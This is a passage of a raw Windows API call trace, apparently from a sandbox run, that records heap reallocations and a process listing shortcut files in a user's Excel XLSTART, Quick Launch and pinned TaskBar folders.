(Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x64) returned 0x2f7508 [0220.210] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x74) returned 0x2c0b20 [0220.210] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x40) returned 0x2c78c0 [0220.210] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x80) returned 0x2fa200 [0220.211] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.218] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.219] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.219] GetLastError () returned 0x12 [0220.219] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.219] GetLastError () returned 0x12 [0220.219] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0220.219] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.220] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x7c) returned 0x2fa200 [0220.220] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.220] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c69a0, Size=0x88) returned 0x2e6040 [0220.220] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb468 [0220.220] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.221] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x5af194f0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x5b2f78b0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0220.221] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x7c) returned 0x2fa200 [0220.221] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x96) returned 0x2e6040 [0220.221] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x50) returned 0x2f9038 [0220.221] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0xa0) returned 0x2f3978 [0220.221] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x5af194f0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x5b2f78b0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.222] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x5af194f0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x5b2f78b0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.222] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5b2f78b0, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0220.222] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x96) returned 0x2e6040 [0220.222] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af194f0, ftCreationTime.dwHighDateTime=0x1d75c80, ftLastAccessTime.dwLowDateTime=0x5af194f0, ftLastAccessTime.dwHighDateTime=0x1d75c80, ftLastWriteTime.dwLowDateTime=0x5b2d1750, ftLastWriteTime.dwHighDateTime=0x1d75c80, nFileSizeHigh=0x0, nFileSizeLow=0x5a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launch Internet Explorer Browser.lnk", cAlternateFileName="LAUNCH~1.LNK")) returned 1 [0220.222] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x96) returned 0x2e6040 [0220.223] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5021c250, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5021c250, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x502423b0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0220.223] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x96) returned 0x2e6040 [0220.223] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0220.223] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x96) returned 0x2e6040 [0220.223] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0220.223] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x96) returned 0x2e6040 [0220.224] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e1680, Size=0xae) returned 0x2f3978 [0220.224] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x5c) returned 0x2d3e40 [0220.224] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2d3e40, Size=0xb8) returned 0x2f6e58 [0220.224] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.224] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.224] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0220.225] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e1680, Size=0xae) returned 0x2e6040 [0220.225] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f6e58, Size=0xd8) returned 0x2f6e58 [0220.225] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c78c0, Size=0x74) returned 0x2c0b20 [0220.225] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c0b20, Size=0xe8) returned 0x2cd798 [0220.225] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb528 [0220.226] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.227] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.227] GetLastError () returned 0x12 [0220.228] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe8925870, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8925870, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0220.228] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e1680, Size=0xae) returned 0x2e6040 [0220.228] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f7508, Size=0xbe) returned 0x2f3978 [0220.228] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb528, Size=0x64) returned 0x2f7508 [0220.228] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f7508, Size=0xc8) returned 0x2f6e58 [0220.228] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe8925870, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8925870, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb528 [0220.229] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe8925870, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xe8925870, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.229] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f125f50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0220.229] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f7508, Size=0xbe) returned 0x2f3978 [0220.229] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8462c70, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8462c70, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xad191d70, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x950, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel 2016.lnk", cAlternateFileName="EXCEL2~1.LNK")) returned 1 [0220.229] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f7508, Size=0xbe) returned 0x2f3978 [0220.230] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f5210, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f0f5210, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ed7ee60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer (2).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0220.230] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f7508, Size=0xbe) returned 0x2f3978 [0220.230] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x921e7f, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x5a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0220.231] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f7508, Size=0xbe) returned 0x2f3978 [0220.231] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8651e50, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8651e50, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xad8b5f70, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x93c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNote 2016.lnk", cAlternateFileName="ONENOT~1.LNK")) returned 1 [0220.231] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f7508, Size=0xbe) returned 0x2f3978 [0220.231] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe875c7f0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe875c7f0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xad928390, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x94a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook 2016.lnk", cAlternateFileName="OUTLOO~1.LNK")) returned 1 [0220.231] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x3022b8, Size=0xbe) returned 0x2f3978 [0220.231] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8867190, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8867190, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xad928390, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x975, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint 2016.lnk", cAlternateFileName="POWERP~1.LNK")) returned 1 [0220.232] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x3022b8, Size=0xbe) returned 0x3032b8 [0220.232] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f10d8b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f10d8b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer (2).lnk", cAlternateFileName="WINDOW~3.LNK")) returned 1 [0220.233] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x3022b8, Size=0xbe) returned 0x3032b8 [0220.233] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0220.233] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x3022b8, Size=0xbe) returned 0x3032b8 [0220.233] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f125f50, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7f125f50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xd869fe87, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player (2).lnk", cAlternateFileName="WINDOW~4.LNK")) returned 1 [0220.233] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x3022b8, Size=0xbe) returned 0x3032b8 [0220.234] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x2e24b3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x60b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0220.234] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x3022b8, Size=0xbe) returned 0x3032b8 [0220.234] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8925870, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xe8925870, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xad9c0910, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x976, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word 2016.lnk", cAlternateFileName="WORD20~1.LNK")) returned 1 [0220.234] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x3022b8, Size=0xbe) returned 0x3032b8 [0220.234] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.234] GetLastError () returned 0x12 [0220.235] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", 